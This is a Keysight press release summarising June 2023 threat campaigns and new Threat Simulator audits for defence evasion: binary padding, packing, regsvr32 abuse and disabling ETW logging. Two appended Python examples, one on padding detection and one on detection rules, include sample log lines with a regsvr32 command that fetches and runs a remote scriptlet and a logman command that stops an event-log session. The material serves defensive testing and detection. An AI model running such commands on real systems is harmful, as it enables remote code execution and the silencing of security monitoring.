Keysight Technologies Inc.

07/05/2023 | News release | Distributed by Public on 07/05/2023 13:37

Threat Simulator: June 2023 Update

Whatever sector you operate in, you will need to ensure that you can stay safe from the latest cyber-attacks. Our expert team at Keysight's ATI (Application and Threat Intelligence) Research Center is constantly on the lookout for new threats, enabling us to create simulations of these threats within hours of their discovery.

These simulations are carefully crafted to replicate real-world scenarios, allowing you to test your controls manually or automatically. By doing so, you can ensure that your security posture is up to par and well-prepared to face potential threats, armed with identifiable Indicators of Compromise (IOC).

Our solution also empowers you to filter and prioritize threats based on your specific regional and industry preferences.

For instance, we assist our healthcare customers in staying one step ahead of cybercriminals. This month, we feature threats from Camaro Dragon, a China-based espionage threat actor who recently made headlines as the cause of a cybersecurity incident at a European hospital, attributed to the powerful malware named WispRider. Although it originated in Southeast Asia, infections have already been detected in various regions worldwide.

For more information on how we help our healthcare customers, check out our ebook.

Read on to learn how we can assist you, regardless of your vertical.

New Threat Campaigns:

Tracking Traces of Malware Disguised as Hancom Office Document File and Being Distributed (RedEyes)

AhnLab Security Emergency response Center has discovered a new malware disguised as Hancom Office files.

The malware comes in an archived form and contains an executable masquerading as a Hancom Office document by mimicking its default file icon.

Once executed, it acquires persistence on the target machine and uses existing benign processes to communicate with a C2 server.

A web shell is employed in the communication, and the attack shares similarities with activity attributed to the APT37/RedEyes threat actor.

Malware Spotlight: Camaro Dragon's TinyNote Backdoor

Check Point Research has uncovered a novel Go-based backdoor called TinyNote, created by Camaro Dragon, a Chinese threat group, after gaining access to and investigating weakly secured distribution servers used by the attackers.

The malware is used in the first stage of an attack and can enumerate machines and execute remote commands via PowerShell or Go.

A unique feature found in the sample is the backdoor's ability to bypass SmadAV, an antivirus product popular in South-East Asia.

TinyNote is attributed to Camaro Dragon because of naming conventions similar to those found in another known backdoor called MQsTTang.

Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence

SentinelOne discovered a social engineering campaign conducted by the Kimsuky threat actor against experts in North Korean affairs.

The aim of the campaign is to steal email credentials, distribute reconnaissance malware, and obtain NK News subscription credentials.

The threat actor is using impersonation tactics and malicious websites to deceive targets.

CVE-2023-34362: MOVEit Transfer SQL Injection Vulnerability Threat Brief

Unit42 alerted customers about a critical SQL injection vulnerability (CVE-2023-34362) in the MOVEit Transfer product.

MOVEit Transfer is an application used to manage file transfers with the aim of enabling secure collaboration and automated transfers of sensitive data.

This vulnerability was exploited by threat actors, who were using it to upload a web shell in order to gain unauthorized access to the server.

Investigations are ongoing, and it is advised to apply mitigation measures.

ASEC Weekly Malware Statistics (May 22nd, 2023 - May 28th, 2023)

AhnLab released a weekly malware statistics report for May 22nd, 2023 - May 28th, 2023.

In the collected data, infostealers were first with 52.5%, downloaders second with 38.1%, followed by backdoors with 6.4%, ransomware with 2.5% and coinminers with 0.4%.

The top 5 malware identified were: Amadey, AgentTesla, Formbook, Lokibot and SnakeKeylogger.

Facebook clickbait leads to money scam for users

Malwarebytes released a report on a new scam observed on Facebook, where users are tricked into clicking on posts leading to fake browser alerts, aiming to scam them for money.

The threat actor made this campaign unique by abusing Google Cloud Run to generate new malicious links frequently.

The scheme starts with certain Facebook accounts posting various types of content, including clickbait articles and newsworthy stories. The websites linked in these posts utilize a technique called cloaking, which deceives security controls.

Malware Being Distributed Disguised as a Job Application Letter

AhnLab released a report that uncovers a persistent distribution of malware that masquerades as a job application letter.

This malicious software is being spread through deceptive URLs designed to mimic a popular Korean job-seeking website.

The malware is equipped with a functionality that scans for antivirus processes, including AhnLab's V3Lite.exe, and carries out various harmful actions such as stealing sensitive information and recording keystrokes.

STEALTH SOLDIER BACKDOOR USED IN TARGETED ESPIONAGE ATTACKS IN NORTH AFRICA

Check Point Research identified a series of targeted espionage attacks in Libya, involving a new custom backdoor called Stealth Soldier.

The malware functions as a surveillance tool, enabling activities like file exfiltration, microphone recording and keylogging.

It was observed that this threat campaign shares infrastructure similarities with a previous campaign called "Eye on the Nile."

About PowerHarbor, a new malware used by SteelClover

NTT Security released a report regarding a new type of malware called PowerHarbor, which has been observed since the end of May 2023.

The threat actor behind PowerHarbor, SteelClover, designed one of the modules of the malware in order to steal credentials from web browsers.

ASEC Weekly Phishing Email Threat Trends (May 28th, 2023 - June 3rd, 2023)

AhnLab Security Emergency response Center (ASEC) has published a report on phishing email threats that occurred from May 28th, 2023 to June 3rd, 2023.

That week, the phishing emails were mostly disguised as a certain transport company with the Korean title: "UPS Korea-att invoice content".

The report highlights that FakePage is the most common threat type, with 36%, followed by Infostealers (27%), Trojan (22%), Downloader (10%), Exploit (2%), Worm (1%), Backdoor (1%) and Dropper (1%).

Sneaky DoubleFinger loads GreetingGhoul targeting your cryptocurrency

Securelist released a report regarding a new cryptocurrency theft method using a sophisticated loader called DoubleFinger and a stealer called GreetingGhoul.

DoubleFinger uses multiple stages to infect victims, while GreetingGhoul steals cryptocurrency-related credentials.

The campaign may originate from the post-Soviet space, and victims have been found in Europe, the USA, and Latin America.

Lazarus Threat Group Exploiting Vulnerability of Korean Finance Security Solution

AhnLab released a report about Lazarus threat group, which has been exploiting vulnerabilities in software such as INISAFE CrossWeb EX, MagicLine4NX, VestCert, and TCO!Stream.

This threat actor is targeting Korean companies and uses methods like watering hole attacks and third-party library execution vulnerabilities.

Through these methods, they download and execute malware, as well as propagate it internally.

ASEC Weekly Malware Statistics (June 5th, 2023 - June 11th, 2023)

AhnLab released a weekly malware statistics report for June 5th, 2023 - June 11th, 2023.

In the collected data, infostealers were first with 44.6%, downloaders second with 43.9%, followed by backdoors with 9.5% and ransomware with 2%.

The top 5 malware identified were: Amadey, AgentTesla, Guloader, Lokibot and Formbook.

Shampoo: A New ChromeLoader Campaign

HP Wolf Security released a report about a new ChromeLoader Campaign, called Shampoo, which installs malicious advertising extensions in Google Chrome.

The malware employs a complex infection chain, where victims unknowingly download and execute malicious VBScript files.

Once installed, the extension collects personal information, redirects searches, and injects unwanted ads.

#StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability

As part of the #StopRansomware effort, CISA released a report covering 'CLOP Ransomware' and published information related to the TTPs and IOCs used.

CL0P ransomware gang has recently exploited an SQL injection vulnerability in Progress Software's managed file transfer (MFT) solution called MOVEit Transfer.

In recent campaigns, CL0P ransomware has focused more on data exfiltration than on encryption. The CL0P ransomware gang, also known as TA505, has used zero-day exploits to install web shells on vulnerable servers, allowing them to execute commands and steal data.

The threat actor has also targeted the GoAnywhere MFT platform and exfiltrated data from approximately 130 victims.

Tracking Diicot: an emerging Romanian threat actor

Cado released an article about an emerging threat actor, called Diicot, known for cryptojacking campaigns and developing malware as a service.

The group uses self-propagating tools, custom packers for obfuscation, cryptojacking, internet scanning for vulnerable systems, doxxing, and a botnet agent named Cayosin for DDoS attacks.

They were also involved in a feud with another hacking group, exposing personal details through doxxing.

The report focuses on Diicot's latest campaign and their self-propagating SSH brute-forcer.

Shuckworm: Inside Russia's Relentless Cyber Campaign Against Ukraine

Symantec released a report about a Russian-linked cyber attack group, called Shuckworm, that has been targeting Ukraine since 2014.

The aim of the campaign is to gain military, security and government intelligence to support invading forces.

Shuckworm uses phishing emails with malicious attachments to gain access to victim machines and steals sensitive information such as military reports. They constantly update their tools and infrastructure, including USB propagation malware.

Threat Source Newsletter (June 15, 2023) - URLs have always been a great hiding place for threat actors

Talos released its new weekly Threat Source Newsletter (June 15, 2023) including the most prevalent malware observed over the past week.

It was reported that the recent Patch Tuesday from Microsoft brought relief as there were no new zero-day vulnerabilities. However, it is crucial to address the multiple critical vulnerabilities, rated with a severity score of 9.8 out of 10, disclosed by Microsoft, which require immediate patching to mitigate potential risks.

The top headlines of the week include Progress Software releasing patches for security vulnerabilities in its MOVEit file transfer software, high-profile American investors considering purchasing assets from NSO Group, and America's top cybersecurity official warning of potential cyber attacks from Chinese state-sponsored actors targeting critical infrastructure.

New Malware Campaign Targets LetsVPN Users

Cyble Research and Intelligence Labs has discovered a phishing campaign in which attackers impersonated the LetsVPN provider and tricked users into downloading malicious payloads.

Once the fake installer is executed, three payloads may be loaded on the victim's computer: BlackMoon (banking trojan), Farfli (backdoor) and a potentially unwanted application called KingSoft.

Observed effects of this attack include keylogging, banking credential theft through web browser tampering, and remote access.

Ransomware Roundup - Big Head

On 2023-06-16, Fortinet Threat Intelligence, FortiGuard, released a bi-weekly roundup of its ransomware dataset.

This report covers variants of the Big Head ransomware.

Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor, Suspected Links to China

Mandiant released a report regarding the exploitation of a vulnerability (CVE-2023-2868) in the Barracuda Email Security Gateway (ESG), by a Chinese threat actor identified as UNC4841 in order to start espionage campaigns against various targets.

The threat actor sends emails with specially crafted attachments that trigger remote code execution in the Barracuda ESG due to incorrect file parsing. Usually, the injected command downloads further malicious components that gain persistence and extend the attacker's capabilities.

Regarding backdoors, the attacker utilizes SEASPY, SALTWATER and SEASIDE to collect data about the victim's machine and the network it resides in.

A rootkit disguised as a Linux kernel module (SANDBAR) is also present to hide the previously stated backdoors.

In addition, other helper modules (SEASPRAY and SKIPJACK, written in Lua) and WHIRLPOOL (written in C) further extend the attacker's capabilities.

RecordBreaker Infostealer Disguised as a .NET Installer

AhnLab published a report regarding a new campaign that uses malicious downloaders added to archives containing benign files (usually cracked software), in order to download RecordBreaker Infostealer.

The downloader, written in Rust, can change its behavior based on the nature of the existing environment. If it discovers that it is inside a sandbox no malware download takes place.

In genuine environments, the malicious behavior triggers and RecordBreaker Infostealer is downloaded and injected.

Mystic Stealer: The New Kid on the Block

InQuest along with Zscaler ThreatLabz released a report regarding Mystic Stealer, an emerging malware capable of exfiltrating session cookies, credentials (such as Steam and Telegram) and cryptocurrency wallets.

The stealer is built not only to be on par with other existing stealers regarding the quality and quantity of the information stolen but to also evade analysis and defense mechanisms.

The malware's distinctive features are its use of a custom encrypted protocol to communicate with the C2 server and its ability to terminate itself if it is started after an expiration date embedded in it.

The malware was advertised on some forums, and a control panel used by the attackers to manage their campaigns can also be purchased along with the stealer itself.

Inside of the WASP's nest: deep dive into PyPI-hosted malware

VirusTotal published a report about malicious Python packages, mostly built for information stealing, uploaded to the PyPI repository and used for supply chain attacks.

Threat actors create Python libraries with names similar to genuine ones, relying on typos made by developers when installing such packages. Usually, attackers modify popular modules and add malicious components, or upload entire undisguised malware.

Discovered features in these samples include stealing credentials, browser cookies, cryptocurrency wallets and environment variables.

Regarding the malicious samples, the vast majority are open-source projects, slightly modified when uploaded to PyPI.

RedEyes Group Wiretapping Individuals (APT37)

AhnLab discovered a new information stealer developed by the RedEyes threat group, capable of wiretapping and of communicating with the attacker through the Ably platform.

Initial access is achieved through a CHM (Compiled HTML Help) file that contains the malware sample. Victim computers might receive this file through spear phishing email campaigns.

Once the CHM file is opened, it downloads a PowerShell script which gains persistence on the target machine. Later attacks utilize a Go-based backdoor capable of transferring data in real time through the Ably platform. Communication with this platform is possible through an API key stored in a GitHub repository.

Exfiltrated data consists of screenshots, keystrokes and information from removable media devices.

Analysis of Ransomware With BAT File Extension Attacking MS-SQL Servers (Mallox)

AhnLab reported an evolved use of BAT files to store and deliver Mallox ransomware and Remcos RAT to poorly managed MS-SQL servers.

The attacker makes use of PowerShell and the sqlps module to execute the BAT file containing the two previously mentioned malware samples.

Mallox is injected into a benign process through a method known as process hollowing and starts blocking recovery methods for targeted files. Furthermore, it initiates brute force and dictionary attacks on the user credentials associated with the MS-SQL database instance.

Unpacking RDStealer: An Exfiltration Malware Targeting RDP Workloads

Bitdefender Labs published a report regarding the use of RDStealer and Logutil backdoor in compromising client machines which connect to a previously infected server through Remote Desktop Protocol (RDP).

These custom-made malware programs, written in Go, have been used in espionage operations in East Asia and are capable of credential theft and data exfiltration.

The attack is possible if the server was previously compromised with RDStealer, which monitors incoming client connections and spreads the Logutil backdoor to clients that have the Client Drive Mapping (CDM) option enabled.

Logutil is then able to gain persistence in the client machine and exfiltrate files, clipboard content and browser history.

PindOS: New JavaScript Dropper Delivering Bumblebee and IcedID

Deep Instinct Threat Research Lab presented an upgraded malware dropper, PindOS, which shifted from PowerShell to JavaScript in order to deliver two other malware families, Bumblebee and IcedID.

The PindOS dropper can download the previously mentioned malware from multiple URLs, a method used to increase its chances of infection. The downloaded payloads are padded with pseudo-randomly generated content in order to bypass detection, with limited success.

Bumblebee is found as a DLL with anti-debugging and anti-sandboxing features.

IcedID represents an information stealer, specialized in finding and retrieving banking credentials. Recently, however, the program has shifted its focus to be more of a loader malware, capable of delivering various other malicious applications.

Graphican: Flea Uses New Backdoor in Attacks Targeting Foreign Ministries

Symantec uncovered a new backdoor, called Graphican, used by the Flea threat actor to target embassies in the Americas.

The backdoor uses Microsoft Graph API and OneDrive to get an encrypted C2 server URL for data exfiltration and communication. The encrypted URL is decrypted locally by the backdoor.

Once infected, the victim computer is exposed to remote PowerShell commands issued by the C2 server.

In addition, the threat actor uses an extensive set of credential dumping tools such as Mimikatz and Lazagne, and exploits the CVE-2020-1472 privilege escalation vulnerability.

Ransomware Redefined: RedEnergy Stealer-as-a-Ransomware attacks

Zscaler ThreatLabz has uncovered a complex campaign which uses fake company webpages in order to deliver RedEnergy Stealer, a hybrid of an information stealer and ransomware.

The malware is disguised as a browser update delivered through malicious webpages of various organizations which were advertised on LinkedIn.

RedEnergy Stealer is responsible for browser information theft, deleting Windows backups and encrypting files found on the affected system.

Beyond the Horizon: Traveling the World on Camaro Dragon's USB Flash Drives

Check Point Response Team disclosed an incident in which a European hospital was infected with spyware delivered by the Camaro Dragon threat group through USB drives, specifically the WispRider payload and the HopperTick launcher.

HopperTick, rewritten from Delphi to C++, is responsible for hiding all files on the USB drive and displaying only itself with a USB drive icon. Once executed, it uses the DLL side-loading technique to evade detection. It also checks for other pluggable devices that can be infected.

WispRider, a DLL delivered by HopperTick, is responsible for communicating with the C2 server and for writing itself to other pluggable devices found by HopperTick.

IoT devices and Linux-based systems targeted by OpenSSH trojan campaign

Microsoft has published a report discussing a new cryptojacking method that uses a patched version of OpenSSH to download malware and infect additional hosts known to the victim.

The attack vector starts with a brute force on a misconfigured internet-facing Linux machine or an IoT device.

This compromised version of OpenSSH is bundled with malicious scripts that make it compatible with multiple architectures and compile the backdoor. It checks whether the infected system is a honeypot and, if it is not, collects various system configuration information and passwords.

Obfuscation is provided by the Diamorphine and Reptile rootkits, which communicate through a component based on the ZiggyStarTux IRC bot connected to the C2 server.

Trojanized Super Mario Game Installer Spreads SupremeBot Malware

Cyble Research and Intelligence Labs has discovered a trojanized game installer which delivers XMR Miner, SupremeBot and Umbral Stealer.

The game installer has a benign component that installs the Super Mario game while dropping the previously mentioned malware.

XMR Miner is responsible for mining the Monero cryptocurrency.

SupremeBot manages the miner's network communication and receives work tasks.

Lastly, Umbral Stealer, an open-source information stealer written in C#, is capable of gathering screenshots, webcam images, as well as browser passwords and cookies.

New Fast-Developing ThirdEye Infostealer Pries Open System Information

Fortinet discovered a new information stealer called ThirdEye, disguised as a document file, capable of exfiltrating data such as BIOS and hardware information (including virtualized environments), network ports used, processes and file system layout.

The malware author disguised the stealer by appending file extensions common to Excel or PDF formats to the executable's name.

Gathered information is sent to the C2 server in plain text. However, some improved samples try to encode data in hexadecimal format.

Following NoName057(16) DDoSia Project's Targets

Sekoia.io analysts released a report regarding a new DDoS campaign linked to NoName057(16), a Russian-affiliated hacktivist group.

Volunteers for this project are required to sign in via a Telegram channel, from which they receive a user ID and an archive containing the DDoS tool, compatible with Windows, Linux and macOS.

The tool was initially written in Python but has since been rewritten in Go. Every malicious participant installs this tool, which communicates with the C2 server and receives target URLs that are then flooded with network requests.

New audits

Binary Padding Obfuscation: Change the hash of the file with junk padding (1 byte); Technique T1027.001; Tactic TA0005 Defence Evasion;

Adversaries may attempt to make an executable or file difficult to analyze by encrypting, encoding, or obfuscating its contents on the system or in transit. Binary padding is a technique used by attackers to change the on-disk representation of a file, by modifying its hash, without altering its functionality. This makes hash-based security controls ineffective.

This audit appends one junk byte (randomly generated) to a file, changing its checksum.

Binary Padding Obfuscation: Change the hash of the file with null byte padding (1 byte - Python); Technique T1027.001; Tactic TA0005 Defence Evasion;

Adversaries may attempt to make an executable or file difficult to analyze by encrypting, encoding, or obfuscating its contents on the system or in transit. Binary padding is a technique used by attackers to change the on-disk representation of a file, by modifying its hash, without altering its functionality. This makes hash-based security controls ineffective.

This audit performs zero padding, also known as null byte padding, by appending one zero byte to a file, changing its checksum.

Binary Padding Obfuscation: Change the hash of the file with junk padding (1000 bytes); Technique T1027.001; Tactic TA0005 Defence Evasion;

Adversaries may attempt to make an executable or file difficult to analyze by encrypting, encoding, or obfuscating its contents on the system or in transit. Binary padding is a technique used by attackers to change the on-disk representation of a file, by modifying its hash, without altering its functionality. This makes hash-based security controls ineffective.

This audit appends 1000 junk bytes (randomly generated) to a file, changing its checksum.

Binary Padding Obfuscation: Change the hash of the file with zero padding (1000 bytes); Technique T1027.001; Tactic TA0005 Defence Evasion;

Adversaries may attempt to make an executable or file difficult to analyze by encrypting, encoding, or obfuscating its contents on the system or in transit. Binary padding is a technique used by attackers to change the on-disk representation of a file, by modifying its hash, without altering its functionality. This makes hash-based security controls ineffective.

This audit appends 1000 zero bytes to a file, changing its checksum.

Software Packing Obfuscation - 'UPX': Packed Executable; Technique T1027.002; Tactic TA0005 Defence Evasion;

In order to protect their malicious code, adversaries may opt for software packing. This method of obfuscation successfully compresses and/or encrypts an executable, changing its signature and thus evading signature-based detection.

UPX is an open-source packer (https://upx.github.io/) for executable files that supports multiple executable formats.

This audit deploys a UPX-packed executable file on the system-under-test, runs it and writes the output to a file. This packed executable writes dummy data to the standard output.

Software Packing Obfuscation - 'NSIS': Packed Executable; Technique T1027.002; Tactic TA0005 Defence Evasion;

In order to protect their malicious code, adversaries may opt for software packing. This method of obfuscation successfully compresses and/or encrypts an executable, changing its signature and thus evading signature-based detection.

NSIS (Nullsoft Scriptable Install System) is an open-source project (https://sourceforge.net/projects/nsis/) under the zlib license that can be used for creating Windows installers. It is script-based and therefore allows a user to define their own installation logic and tasks.

This audit uses an NSIS template to create an NSIS script based on the input arguments provided. It uses NSIS to pack an executable inside a Windows installer. At runtime, the installer drops the executable in the specified location and runs it.
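The following is an added worked example, not part of Keysight's audits or of any tool the page describes, that shows what the four binary padding audits above measure and why hash-based controls fail them, and what a structure-aware check can still see for the packing audits. It constructs a minimal, non-executable PE-shaped file (a constructed sample; the builder, parser and every function name are assumptions for illustration), pads it with junk or zero bytes exactly as the audits do, and compares the whole-file SHA-256 with a hash of the mapped image only (headers plus section raw data). The overlay size and the packer-style section-name check are the defender-side signals.

```python
import hashlib
import os
import struct

COFF_HEADER = 20      # size of IMAGE_FILE_HEADER
SECTION_HEADER = 40   # size of IMAGE_SECTION_HEADER


def build_sample_pe(section_names=(b".text",), payload=b"\x90" * 16):
    """Constructed sample: DOS header, PE signature, COFF header, no optional
    header, one raw section per name. Not executable; only the fields that the
    parser below reads carry meaningful values."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 64)          # e_lfanew = 64
    headers_end = 64 + 4 + COFF_HEADER + len(section_names) * SECTION_HEADER
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x0102)
    table, raw = b"", b""
    for i, name in enumerate(section_names):
        ptr = headers_end + len(raw)                                # PointerToRawData
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\x00"), len(payload),
                             0x1000 * (i + 1), len(payload), ptr, 0, 0, 0, 0, 0x60000020)
        raw += payload
    return dos + b"PE\x00\x00" + coff + table + raw


def parse_sections(data):
    """Return (end of section table, [(name, raw_ptr, raw_size), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]   # SizeOfOptionalHeader
    table = coff + COFF_HEADER + opt_size
    secs = []
    for i in range(nsec):
        off = table + i * SECTION_HEADER
        name = data[off:off + 8].rstrip(b"\x00")
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        secs.append((name, raw_ptr, raw_size))
    return table + nsec * SECTION_HEADER, secs


def image_end(data):
    """Offset just past the last byte the PE headers account for."""
    headers_end, secs = parse_sections(data)
    return max([headers_end] + [ptr + size for _, ptr, size in secs])


def overlay_size(data):
    """Bytes appended beyond the declared image: where padding ends up."""
    return len(data) - image_end(data)


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def image_hash(data):
    """Hash of the mapped image only; unchanged by trailing padding."""
    return sha256(data[:image_end(data)])


def pad_junk(data, n):
    return data + os.urandom(n)          # the 'junk padding' audits


def pad_zero(data, n):
    return data + b"\x00" * n            # the 'zero / null byte padding' audits


def packer_section_names(data):
    """Section names typical of UPX output. Weak indicator: names are trivially
    renamed, so treat it as a triage hint, not a verdict."""
    _, secs = parse_sections(data)
    return [name for name, _, _ in secs if name.upper().startswith(b"UPX")]


def assess(data):
    return {
        "file_sha256": sha256(data),
        "image_sha256": image_hash(data),
        "overlay_bytes": overlay_size(data),
        "packer_sections": packer_section_names(data),
    }


if __name__ == "__main__":
    clean = build_sample_pe()
    samples = [("clean", clean), ("junk+1", pad_junk(clean, 1)),
               ("zero+1000", pad_zero(clean, 1000)),
               ("upx-named", build_sample_pe((b"UPX0", b"UPX1")))]
    for label, sample in samples:
        print(label, assess(sample))
```

Every padded variant gets a new file hash, so an allow or deny list keyed on the whole-file hash no longer matches, while the image hash stays identical and the overlay counter reports exactly how many bytes were appended. Note that an overlay by itself is not evidence of tampering: an NSIS installer, like the one the NSIS audit builds, legitimately stores its payload in the overlay, so the useful question is whether the overlay is expected for that file type, not whether it exists.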

Regsvr32 - 'regsvr32.exe': Execute remote SCT file (Command Prompt); Technique T1218.010; Tactic TA0005 Defence Evasion;

Regsvr32.exe is a command-line program used to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.

Adversaries may abuse regsvr32.exe to execute a remote .SCT script with scrobj.dll that will create a new file in the TEMP folder. The .SCT file contains a JScript script.

Regsvr32 - 'regsvr32.exe': Execute SCT file (Command Prompt); Technique T1218.010; Tactic TA0005 Defence Evasion;

Regsvr32.exe is a command-line program used to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.

Adversaries may abuse regsvr32.exe to execute a local .SCT script with scrobj.dll that will create a new file in the TEMP folder. The .SCT file contains a JScript script.

Regsvr32 - 'regsvr32.exe': Execute DLL file (Command Prompt); Technique T1218.010; Tactic TA0005 Defence Evasion;

Regsvr32.exe is a command-line program used to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.

Adversaries may abuse regsvr32.exe to execute an arbitrary DLL that will create a new file in the TEMP folder.

Disable or Modify System Firewall - PsExec and logman: Stop PowerShell script block logging (Command Prompt); Technique T1562.006; Tactic TA0005 Defence Evasion;

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed.

This could include maliciously redirecting or even disabling host-based sensors, such as Event Tracing for Windows (ETW), by changing settings that control the collection and flow of event telemetry.

This audit disables the ETW provider Microsoft-Windows-PowerShell/Operational so that script block logging does not alert on the suspicious PowerShell cmdlets listed here [1].

[1] : https://github.com/PowerShell/PowerShell/blob/79f21b41de0de9b2f68a19ba1fdef0b98f3fb1cb/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs#L1546-L1829
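The following is an added detection example, not part of Keysight's audits or of any vendor tool, covering the three Regsvr32 audits (T1218.010) and the PsExec/logman audit (T1562.006) above. It runs simple process-creation rules over a handful of constructed log lines (the pipe-delimited format, hostnames, user names, the 203.0.113.10 documentation address and the command lines are all invented for the example) and returns one finding per matching rule, which is the kind of check a blue team would want firing when these audits are run against a system-under-test.

```python
import os
import re
from dataclasses import dataclass

# Constructed process-creation events: timestamp|host|user|parent|image|command line
SAMPLE_EVENTS = """\
2023-06-20T10:01:02Z|WS01|corp\\alice|explorer.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32.exe /s /i:https://203.0.113.10/update.sct scrobj.dll
2023-06-20T10:02:15Z|WS01|corp\\alice|cmd.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32.exe /s /i:C:\\Users\\alice\\AppData\\Local\\Temp\\a.sct scrobj.dll
2023-06-20T10:03:40Z|WS01|corp\\alice|cmd.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32.exe /s C:\\Users\\alice\\AppData\\Local\\Temp\\payload.dll
2023-06-20T10:05:00Z|WS01|NT AUTHORITY\\SYSTEM|PSEXESVC.exe|C:\\Windows\\System32\\logman.exe|logman.exe stop EventLog-Application -ets
2023-06-20T10:09:30Z|WS01|corp\\bob|msiexec.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32.exe /s "C:\\Program Files\\Vendor\\control.ocx"
2023-06-20T10:12:00Z|WS01|corp\\bob|explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt
"""

USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|public)\\")
REMOTE_SCT = re.compile(r"/i:\s*https?://")
LOGMAN_SESSION_CHANGE = re.compile(r"\b(stop|delete|update)\b")


@dataclass
class Event:
    ts: str
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


def parse_events(text):
    """Parse the constructed pipe-delimited format into Event records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, parent, image, cmdline = line.split("|", 5)
        events.append(Event(ts, host, user, parent, image, cmdline))
    return events


def classify(ev):
    """Return (technique, detail) pairs for one event; empty list if benign."""
    image = os.path.basename(ev.image.replace("\\", "/")).lower()
    cmd = ev.cmdline.lower()
    findings = []
    if image == "regsvr32.exe":
        if "scrobj.dll" in cmd:
            # scrobj.dll turns regsvr32 into a scriptlet (.sct / JScript) host
            where = "remote" if REMOTE_SCT.search(cmd) else "local"
            findings.append(("T1218.010", f"regsvr32 loading a {where} .sct scriptlet via scrobj.dll"))
        elif USER_WRITABLE.search(cmd):
            # DLL registration from a path any user can write to
            findings.append(("T1218.010", "regsvr32 registering a DLL from a user-writable path"))
    elif image == "logman.exe":
        if LOGMAN_SESSION_CHANGE.search(cmd) and "eventlog-" in cmd:
            # Touching an EventLog-* ETW session can silence PowerShell/Operational
            findings.append(("T1562.006", "logman altering an EventLog ETW session"))
    return findings


def scan(text):
    """Run every rule over every event; each finding records its context."""
    results = []
    for ev in parse_events(text):
        for technique, detail in classify(ev):
            results.append({
                "ts": ev.ts, "host": ev.host, "user": ev.user,
                "technique": technique, "detail": detail,
                "via_psexec": ev.parent.lower() == "psexesvc.exe",
            })
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        tag = " (launched through the PsExec service)" if r["via_psexec"] else ""
        print(f'{r["ts"]} {r["host"]} {r["technique"]}: {r["detail"]}{tag}')
```

The vendor OCX registered by an installer from Program Files and the notepad launch produce no findings, so the rules stay quiet on the ordinary use of regsvr32 that the audit descriptions mention. The PsExec flag is carried separately because remote service launches of logman are the context the audit simulates, and that context is a useful severity modifier rather than a rule of its own.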

To find out more about how Keysight can help you rapidly find, remediate, and validate exploitable security vulnerabilities before they become headline news, check out our website.

To sign up for our MSSP program, visit here.